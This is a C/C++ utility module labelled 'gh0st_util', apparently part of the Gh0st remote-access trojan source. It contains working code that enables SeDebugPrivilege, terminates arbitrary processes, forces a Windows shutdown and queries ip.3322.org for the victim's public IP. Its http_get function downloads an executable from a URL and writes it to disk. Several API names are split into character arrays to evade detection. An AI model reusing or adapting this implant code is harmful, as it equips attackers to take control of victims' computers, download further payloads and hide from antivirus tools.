gh0st_util

/* 
 * File:   util.h
 * Author: Administrator
 *
 * Created on 2014年3月19日, 上午9:26
 */

#ifndef UTIL_H
#define	UTIL_H
#include "stdafx.h"

//删除多目录下的文件
bool DeleteDirectory(LPCTSTR lpszDirectory);
bool MakeSureDirectoryPathExists(LPCTSTR pszDirPath);
//获取外网IP
void OnGetwan();
//提升权限
BOOL DebugPrivilege(const char *PName,BOOL bEnable);
//关闭多个进程,KillProcess((LPBYTE)lpBuffer + 1, nSize - 1);
void KillProcess(LPBYTE lpBuffer, UINT nSize);
void ShutdownWindows(DWORD dwReason );
bool http_get(LPCTSTR szURL, LPCTSTR szFileName);
//修改进程权限
BOOL EnablePri();
char *DelSpace(char *szData);


#endif	/* UTIL_H */

#include "stdafx.h"

#include "util.h"
#include  <afxinet.h>

bool DeleteDirectory(LPCTSTR lpszDirectory)
{
	WIN32_FIND_DATA	wfd;
	char	lpszFilter[MAX_PATH];
	wsprintf(lpszFilter, "%s\\*.*", lpszDirectory);
	HANDLE hFind = FindFirstFile(lpszFilter, &wfd);
	if (hFind == INVALID_HANDLE_VALUE) // 如果没有找到或查找失败
		return FALSE;
	do
	{
		if (wfd.cFileName[0] != '.')
		{
			if (wfd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
			{
				char strDirectory[MAX_PATH];
				wsprintf(strDirectory, "%s\\%s", lpszDirectory, wfd.cFileName);
				DeleteDirectory(strDirectory);
			}
			else
			{
				char strFile[MAX_PATH];
				wsprintf(strFile, "%s\\%s", lpszDirectory, wfd.cFileName);
				DeleteFile(strFile);
			}
		}
	} while (FindNextFile(hFind, &wfd));
	FindClose(hFind); // 关闭查找句柄
	if(!RemoveDirectory(lpszDirectory))
	{
		return FALSE;
	}
	return true;
}
bool MakeSureDirectoryPathExists(LPCTSTR pszDirPath)
{
	LPTSTR p, pszDirCopy;
	DWORD dwAttributes;
	__try
	{
		pszDirCopy = (LPTSTR)malloc(sizeof(TCHAR) * (lstrlen(pszDirPath) + 1));
		if(pszDirCopy == NULL)
			return FALSE;
		lstrcpy(pszDirCopy, pszDirPath);
		p = pszDirCopy;
		//  If the second character in the path is "\", then this is a UNC
		//  path, and we should skip forward until we reach the 2nd \ in the path.
		if((*p == TEXT('\\')) && (*(p+1) == TEXT('\\')))
		{
			p++;            // Skip over the first \ in the name.
			p++;            // Skip over the second \ in the name.
			//  Skip until we hit the first "\" (\\Server\).
			while(*p && *p != TEXT('\\'))
			{
				p = CharNext(p);
			}
			// Advance over it.
			if(*p)
			{
				p++;
			}
			//  Skip until we hit the second "\" (\\Server\Share\).
			while(*p && *p != TEXT('\\'))
			{
				p = CharNext(p);
			}
			// Advance over it also.
			if(*p)
			{
				p++;
			}
		}
		else if(*(p+1) == TEXT(':')) // Not a UNC.  See if it's <drive>:
		{
			p++;
			p++;
			// If it exists, skip over the root specifier
			if(*p && (*p == TEXT('\\')))
			{
				p++;
			}
		}
		while(*p)
		{
			if(*p == TEXT('\\'))
			{
				*p = TEXT('\0');
				dwAttributes = GetFileAttributes(pszDirCopy);
				// Nothing exists with this name.  Try to make the directory name and error if unable to.
				if(dwAttributes == 0xffffffff)
				{
					if(!CreateDirectory(pszDirCopy, NULL))
					{
						if(GetLastError() != ERROR_ALREADY_EXISTS)
						{
							free(pszDirCopy);
							return FALSE;
						}
					}
				}
				else
				{
					if((dwAttributes & FILE_ATTRIBUTE_DIRECTORY) != FILE_ATTRIBUTE_DIRECTORY)
					{
						// Something exists with this name, but it's not a directory... Error
						free(pszDirCopy);
						return FALSE;
					}
				}

				*p = TEXT('\\');
			}
			p = CharNext(p);
		}
	}
	__except(EXCEPTION_EXECUTE_HANDLER)
	{
		// SetLastError(GetExceptionCode());
		free(pszDirCopy);
		return FALSE;
	}
	free(pszDirCopy);
	return TRUE;
}
void OnGetwan() 
{
	try
	{
		CInternetSession session;
		CString strURL(_T("http://ip.3322.org/"));
		CFile* pFile = session.OpenURL(strURL);
		DWORD dwLen = pFile->GetLength();
		char* pBuf = new char[dwLen+1];
		memset(pBuf, 0, sizeof(char)*(dwLen+1));
		pFile->Read(pBuf, dwLen);
		//SetDlgItemText(IDC_IP, CString(pBuf));
		AfxMessageBox(CString(pBuf));
		delete[] pBuf;
		pBuf = NULL;
		pFile->Close();
		//g_pLogView->AddToLog("获取外网IP成功");
	}
	catch (CException* e)
	{
		e->ReportError();
		e->Delete();
	}
}
BOOL DebugPrivilege(const char *PName,BOOL bEnable)
{
	typedef BOOL (WINAPI *GetLastErrorT)(VOID);
	char FhTZBW[] = {'G','e','t','L','a','s','t','E','r','r','o','r','\0'};
	GetLastErrorT pGetLastError = (GetLastErrorT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FhTZBW);

	typedef BOOL
		(WINAPI
		*AdjustTokenPrivilegesT)(
		__in      HANDLE TokenHandle,
		__in      BOOL DisableAllPrivileges,
		__in_opt  PTOKEN_PRIVILEGES NewState,
		__in      DWORD BufferLength,
		__out_bcount_part_opt(BufferLength, *ReturnLength) PTOKEN_PRIVILEGES PreviousState,
		__out_opt PDWORD ReturnLength
		);	
	char KIoFqQPSy[] = {'A','D','V','A','P','I','3','2','.','d','l','l','\0'};
	AdjustTokenPrivilegesT pAdjustTokenPrivileges=(AdjustTokenPrivilegesT)GetProcAddress(LoadLibrary(KIoFqQPSy),"AdjustTokenPrivileges");

	typedef BOOL
		(WINAPI
		*LookupPrivilegeValueAT)(
		__in_opt LPCSTR lpSystemName,
		__in     LPCSTR lpName,
		__out    PLUID   lpLuid
		);
	LookupPrivilegeValueAT pLookupPrivilegeValueA=(LookupPrivilegeValueAT)GetProcAddress(LoadLibrary(KIoFqQPSy),"LookupPrivilegeValueA");

	typedef BOOL
		(WINAPI
		*OpenProcessTokenT)(
		__in        HANDLE ProcessHandle,
		__in        DWORD DesiredAccess,
		__deref_out PHANDLE TokenHandle
		);	
	OpenProcessTokenT pOpenProcessToken=(OpenProcessTokenT)GetProcAddress(LoadLibrary(KIoFqQPSy),"OpenProcessToken");

	typedef BOOL (WINAPI *CloseHandleT)
		(
		__in HANDLE hObject
		);
	char DDZGlGm[] = {'C','l','o','s','e','H','a','n','d','l','e','\0'};
	CloseHandleT pCloseHandle = (CloseHandleT)GetProcAddress(LoadLibrary("KERNEL32.dll"),DDZGlGm);

	BOOL              bResult = TRUE;
	HANDLE            hToken;
	TOKEN_PRIVILEGES  TokenPrivileges;

	if (!pOpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken))
	{
		bResult = FALSE;
		return bResult;
	}
	TokenPrivileges.PrivilegeCount = 1;
	TokenPrivileges.Privileges[0].Attributes = bEnable ? SE_PRIVILEGE_ENABLED : 0;

	pLookupPrivilegeValueA(NULL, PName, &TokenPrivileges.Privileges[0].Luid);
	pAdjustTokenPrivileges(hToken, FALSE, &TokenPrivileges, sizeof(TOKEN_PRIVILEGES), NULL, NULL);
	if (pGetLastError() != ERROR_SUCCESS)
	{
		bResult = FALSE;
	}
	pCloseHandle(hToken);
	return bResult;	
}
void KillProcess(LPBYTE lpBuffer, UINT nSize)
{
	typedef VOID (WINAPI *SleepT)
		(
		__in DWORD dwMilliseconds
		);
	SleepT pSleep = (SleepT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"Sleep");

	typedef BOOL (WINAPI *TerminateProcessT)
		(
		__in HANDLE hProcess, __in UINT uExitCode
		);
	TerminateProcessT pTerminateProcess = (TerminateProcessT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"TerminateProcess");

	typedef BOOL (WINAPI *CloseHandleT)
		(
		__in HANDLE hObject
		);
	char DDZGlGm[] = {'C','l','o','s','e','H','a','n','d','l','e','\0'};
	CloseHandleT pCloseHandle = (CloseHandleT)GetProcAddress(LoadLibrary("KERNEL32.dll"),DDZGlGm);

	HANDLE hProcess = NULL;
	DebugPrivilege(SE_DEBUG_NAME, TRUE);

	for (unsigned int i = 0; i < nSize; i += 4)
	{
		hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, *(LPDWORD)(lpBuffer + i));
		pTerminateProcess(hProcess, 0);
		pCloseHandle(hProcess);
	}
	DebugPrivilege(SE_DEBUG_NAME, FALSE);
}

void ShutdownWindows(DWORD dwReason )
{

	typedef BOOL
		(WINAPI
		*ExitWindowsExT)(
		__in UINT uFlags,
		__in DWORD dwReason);
	ExitWindowsExT pExitWindowsEx=(ExitWindowsExT)GetProcAddress(LoadLibrary("USER32.dll"),"ExitWindowsEx");

	DebugPrivilege(SE_SHUTDOWN_NAME,TRUE);
	pExitWindowsEx(dwReason, 0);
	DebugPrivilege(SE_SHUTDOWN_NAME,FALSE);	
}
bool http_get(LPCTSTR szURL, LPCTSTR szFileName)
{
	typedef BOOL (WINAPI *WriteFileT)
		(
		__in        HANDLE hFile,
		__in_bcount(nNumberOfBytesToWrite) LPCVOID lpBuffer,
		__in        DWORD nNumberOfBytesToWrite,
		__out_opt   LPDWORD lpNumberOfBytesWritten,
		__inout_opt LPOVERLAPPED lpOverlapped
		);
	WriteFileT pWriteFile = (WriteFileT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"WriteFile");

	typedef HANDLE (WINAPI *CreateFileAT)
		(
		__in     LPCSTR lpFileName,
		__in     DWORD dwDesiredAccess,
		__in     DWORD dwShareMode,
		__in_opt LPSECURITY_ATTRIBUTES lpSecurityAttributes,
		__in     DWORD dwCreationDisposition,
		__in     DWORD dwFlagsAndAttributes,
		__in_opt HANDLE hTemplateFile
		);	
	CreateFileAT pCreateFileA= (CreateFileAT)GetProcAddress(LoadLibrary("kernel32.dll"),"CreateFileA");

	typedef BOOL (WINAPI *CloseHandleT)
		(
		__in HANDLE hObject
		);
	char DDZGlGm[] = {'C','l','o','s','e','H','a','n','d','l','e','\0'};
	CloseHandleT pCloseHandle = (CloseHandleT)GetProcAddress(LoadLibrary("KERNEL32.dll"),DDZGlGm);
	HINTERNET	hInternet, hUrl;
	HANDLE		hFile;
	char		buffer[1024];
	DWORD		dwBytesRead = 0;
	DWORD		dwBytesWritten = 0;
	BOOL		bIsFirstPacket = true;
	BOOL		bRet = true;
	hInternet = InternetOpen("Mozilla/4.0 (compatible)", INTERNET_OPEN_TYPE_PRECONFIG, NULL,INTERNET_INVALID_PORT_NUMBER,0);
	if (hInternet == NULL)
		return false;
	hUrl = InternetOpenUrl(hInternet, szURL, NULL, 0, INTERNET_FLAG_RELOAD, 0);
	if (hUrl == NULL)
		return false;
	hFile = pCreateFileA(szFileName, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL);
	if (hFile != INVALID_HANDLE_VALUE)
	{
		do
		{
			memset(buffer, 0, sizeof(buffer));
			InternetReadFile(hUrl, buffer, sizeof(buffer), &dwBytesRead);
			// 由判断第一个数据包是不是有效的PE文件
			if (bIsFirstPacket && ((PIMAGE_DOS_HEADER)buffer)->e_magic != IMAGE_DOS_SIGNATURE)
			{
				bRet = false;
				break;
			}
			bIsFirstPacket = false;
			pWriteFile(hFile, buffer, dwBytesRead, &dwBytesWritten, NULL);
		} while(dwBytesRead > 0);
		pCloseHandle(hFile);
	}
	InternetCloseHandle(hUrl);
	InternetCloseHandle(hInternet);
	return bRet;
}
BOOL EnablePri()
{
	typedef __out HANDLE (WINAPI *GetCurrentProcessT)(VOID);
	GetCurrentProcessT pGetCurrentProcess = (GetCurrentProcessT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"GetCurrentProcess");

	typedef BOOL
		(WINAPI
		*AdjustTokenPrivilegesT)(
		__in      HANDLE TokenHandle,
		__in      BOOL DisableAllPrivileges,
		__in_opt  PTOKEN_PRIVILEGES NewState,
		__in      DWORD BufferLength,
		__out_bcount_part_opt(BufferLength, *ReturnLength) PTOKEN_PRIVILEGES PreviousState,
		__out_opt PDWORD ReturnLength
		);	
	char KIoFqQPSy[] = {'A','D','V','A','P','I','3','2','.','d','l','l','\0'};
	AdjustTokenPrivilegesT pAdjustTokenPrivileges=(AdjustTokenPrivilegesT)GetProcAddress(LoadLibrary(KIoFqQPSy),"AdjustTokenPrivileges");


	typedef BOOL
		(WINAPI
		*LookupPrivilegeValueAT)(
		__in_opt LPCSTR lpSystemName,
		__in     LPCSTR lpName,
		__out    PLUID   lpLuid
		);
	LookupPrivilegeValueAT pLookupPrivilegeValueA=(LookupPrivilegeValueAT)GetProcAddress(LoadLibrary(KIoFqQPSy),"LookupPrivilegeValueA");


	typedef BOOL
		(WINAPI
		*OpenProcessTokenT)(
		__in        HANDLE ProcessHandle,
		__in        DWORD DesiredAccess,
		__deref_out PHANDLE TokenHandle
		);	
	OpenProcessTokenT pOpenProcessToken=(OpenProcessTokenT)GetProcAddress(LoadLibrary(KIoFqQPSy),"OpenProcessToken");

	HANDLE hToken;
	if ( pOpenProcessToken(pGetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken) )
	{
		TOKEN_PRIVILEGES tkp;

		pLookupPrivilegeValueA( NULL,SE_DEBUG_NAME,&tkp.Privileges[0].Luid );//修改进程权限
		tkp.PrivilegeCount=1;
		tkp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
		pAdjustTokenPrivileges( hToken,FALSE,&tkp,sizeof tkp,NULL,NULL );//通知系统修改进程权限
		typedef BOOL (WINAPI *GetLastErrorT)
			(
			VOID
			);
		char FhTZBW[] = {'G','e','t','L','a','s','t','E','r','r','o','r','\0'};
		GetLastErrorT pGetLastError = (GetLastErrorT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FhTZBW);
		return( (pGetLastError()==ERROR_SUCCESS) );
	}else{
		return FALSE;
	}
}
char *DelSpace(char *szData)
{
	int i=0 ;
	while(1)
	{
		if(strnicmp(szData+i," ",1))
			break;
		i++;			
	}
	return (szData+i);
}